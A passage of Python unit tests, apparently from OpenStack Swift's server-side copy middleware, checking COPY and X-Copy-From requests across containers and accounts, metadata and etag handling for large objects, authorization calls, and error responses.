self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
self.assertEqual(self.app.swift_sources[0], 'SSC')
self.assertEqual(self.app.swift_sources[1], 'SSC')
self.assertNotIn('swift.orig_req_method', req.environ)
def test_static_large_object_manifest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'X-Static-Large-Object': 'True',
'Etag': 'should not be sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o2?multipart-manifest=put',
swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2?multipart-manifest=get',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(2, len(self.app.calls))
self.assertEqual('GET', self.app.calls[0][0])
get_path, qs = self.app.calls[0][1].split('?')
params = urllib.parse.parse_qs(qs)
self.assertDictEqual(
{'format': ['raw'], 'multipart-manifest': ['get']}, params)
self.assertEqual(get_path, '/v1/a/c/o')
self.assertEqual(self.app.calls[1],
('PUT', '/v1/a/c/o2?multipart-manifest=put'))
req_headers = self.app.headers[1]
self.assertNotIn('X-Static-Large-Object', req_headers)
self.assertNotIn('Etag', req_headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
def test_static_large_object(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'X-Static-Large-Object': 'True',
'Etag': 'should not be sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o2',
swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o2')])
req_headers = self.app.headers[1]
self.assertNotIn('X-Static-Large-Object', req_headers)
self.assertNotIn('Etag', req_headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
def test_basic_put_with_x_copy_from_across_container(self):
self.app.register('GET', '/v1/a/c1/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c2/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c1/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c2/o2', self.authorized[1].path)
def test_basic_put_with_x_copy_from_across_container_and_account(self):
self.app.register('GET', '/v1/a1/c1/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {},
'passed')
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o1') in headers)
self.assertTrue(('X-Copied-From-Account', 'a1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c1/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path)
def test_copy_non_zero_content_length(self):
req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '10',
'X-Copy-From': 'c1/o1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '400 Bad Request')
def test_copy_non_zero_content_length_with_account(self):
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '10',
'X-Copy-From': 'c1/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '400 Bad Request')
def test_copy_with_slashes_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o/o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_slashes_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a1/c1/o/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o/o1') in headers)
self.assertTrue(('X-Copied-From-Account', 'a1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c1/o/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path)
def test_copy_with_spaces_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o%20o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o o2', path)
self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_spaces_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o%20o2',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o o2', path)
self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_leading_slash_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_leading_slash_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_leading_slash_and_slashes_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o/o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o/o2', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_leading_slash_and_slashes_in_x_copy_from_acct(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o/o2',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o/o2', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_no_object_in_x_copy_from(self):
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_copy_with_no_object_in_x_copy_from_and_account(self):
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_copy_with_bad_x_copy_from_account(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': '/i/am/bad'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_copy_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
def test_copy_server_error_reading_source_and_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_not_found_reading_source_and_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_with_object_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Object-Meta-Ours': 'okay'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_object_metadata_and_account(self):
self.app.register('GET', '/v1/a1/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Object-Meta-Ours': 'okay',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_basic_COPY(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'etag': 'is sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o-copy', self.authorized[1].path)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o-copy')])
self.assertIn('etag', self.app.headers[1])
self.assertEqual(self.app.headers[1]['etag'], 'is sent')
self.assertEqual(req.environ['swift.orig_req_method'], 'COPY')
def test_basic_DLO(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'x-object-manifest': 'some/path',
'etag': 'is not sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o-copy')])
self.assertNotIn('x-object-manifest', self.app.headers[1])
self.assertNotIn('etag', self.app.headers[1])
def test_basic_DLO_manifest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'x-object-manifest': 'some/path',
'etag': 'is sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o?multipart-manifest=get', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(2, len(self.app.calls))
self.assertEqual('GET', self.app.calls[0][0])
get_path, qs = self.app.calls[0][1].split('?')
params = urllib.parse.parse_qs(qs)
self.assertDictEqual(
{'format': ['raw'], 'multipart-manifest': ['get']}, params)
self.assertEqual(get_path, '/v1/a/c/o')
self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o-copy'))
self.assertIn('x-object-manifest', self.app.headers[1])
self.assertEqual(self.app.headers[1]['x-object-manifest'], 'some/path')
self.assertIn('etag', self.app.headers[1])
self.assertEqual(self.app.headers[1]['etag'], 'is sent')
    def test_COPY_source_metadata(self):
        """Verify which source headers survive the four copy variants.

        Exercises a plain COPY, a ranged COPY, a PUT with X-Copy-From, and
        a copy of an object onto itself, checking that sysmeta, user meta,
        transient sysmeta, container-update-override sysmeta and
        x-delete-at are carried over — except that a ranged copy drops
        the container-update-override-* headers and the source etag.
        """
        # headers the registered source GET will return
        source_headers = {
            'x-object-sysmeta-test1': 'copy me',
            'x-object-meta-test2': 'copy me too',
            'x-object-transient-sysmeta-test3': 'ditto',
            'x-object-sysmeta-container-update-override-etag': 'etag val',
            'x-object-sysmeta-container-update-override-size': 'size val',
            'x-object-sysmeta-container-update-override-foo': 'bar',
            'x-delete-at': 'delete-at-time'}
        get_resp_headers = source_headers.copy()
        get_resp_headers['etag'] = 'source etag'
        self.app.register(
            'GET', '/v1/a/c/o', swob.HTTPOk,
            headers=get_resp_headers, body='passed')
        def verify_headers(expected_headers, unexpected_headers,
                           actual_headers):
            # Check every expected (key, value) pair appears in
            # actual_headers (keys compared case-insensitively) and that
            # no unexpected key appears.  Pops matches from
            # expected_headers, so callers must pass a copy.
            for k, v in actual_headers:
                if k.lower() in expected_headers:
                    expected_val = expected_headers.pop(k.lower())
                    self.assertEqual(expected_val, v)
                self.assertNotIn(k.lower(), unexpected_headers)
            self.assertFalse(expected_headers)
        # 1. plain COPY: all source headers and the etag are forwarded
        self.app.register('PUT', '/v1/a/c/o-copy0', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o', method='COPY',
                            headers={'Content-Length': 0,
                                     'Destination': 'c/o-copy0'})
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('201 Created', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        method, path, put_headers = self.app.calls_with_headers[-1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c/o-copy0', path)
        verify_headers(source_headers.copy(), [], put_headers.items())
        self.assertIn('etag', put_headers)
        self.assertEqual(put_headers['etag'], 'source etag')
        req = Request.blank('/v1/a/c/o-copy0', method='GET')
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('200 OK', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        # 2. ranged COPY: container-update-override sysmeta and the source
        #    etag must NOT be forwarded (the copy is a partial object)
        self.app.register('PUT', '/v1/a/c/o-copy1', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o', method='COPY',
                            headers={'Content-Length': 0,
                                     'Destination': 'c/o-copy1',
                                     'Range': 'bytes=1-2'})
        status, resp_headers, body = self.call_ssc(req)
        expected_headers = source_headers.copy()
        unexpected_headers = (
            'x-object-sysmeta-container-update-override-etag',
            'x-object-sysmeta-container-update-override-size',
            'x-object-sysmeta-container-update-override-foo')
        for h in unexpected_headers:
            expected_headers.pop(h)
        self.assertEqual('201 Created', status)
        verify_headers(expected_headers, unexpected_headers, resp_headers)
        method, path, put_headers = self.app.calls_with_headers[-1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c/o-copy1', path)
        verify_headers(
            expected_headers, unexpected_headers, put_headers.items())
        self.assertNotIn('etag', put_headers)
        req = Request.blank('/v1/a/c/o-copy1', method='GET')
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('200 OK', status)
        verify_headers(expected_headers, unexpected_headers, resp_headers)
        # 3. PUT with X-Copy-From behaves like the plain COPY
        self.app.register('PUT', '/v1/a/c/o-copy2', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o-copy2', method='PUT',
                            headers={'Content-Length': 0,
                                     'X-Copy-From': 'c/o'})
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('201 Created', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        method, path, put_headers = self.app.calls_with_headers[-1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c/o-copy2', path)
        verify_headers(source_headers.copy(), [], put_headers.items())
        self.assertIn('etag', put_headers)
        self.assertEqual(put_headers['etag'], 'source etag')
        req = Request.blank('/v1/a/c/o-copy2', method='GET')
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('200 OK', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        # 4. copying an object onto itself also preserves everything
        self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o', method='PUT',
                            headers={'Content-Length': 0,
                                     'X-Copy-From': 'c/o'})
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('201 Created', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        method, path, put_headers = self.app.calls_with_headers[-1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c/o', path)
        verify_headers(source_headers.copy(), [], put_headers.items())
        self.assertIn('etag', put_headers)
        self.assertEqual(put_headers['etag'], 'source etag')
def test_COPY_no_destination_header(self):
req = Request.blank(
'/v1/a/c/o', method='COPY', headers={'Content-Length': 0})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
self.assertEqual(len(self.authorized), 0)
def test_basic_COPY_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c1/o2',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o2', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o2', self.authorized[1].path)
def test_COPY_across_containers(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c2/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c2/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c2/o', self.authorized[1].path)
def test_COPY_source_with_slashes_in_name(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_source_with_slashes_in_name(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
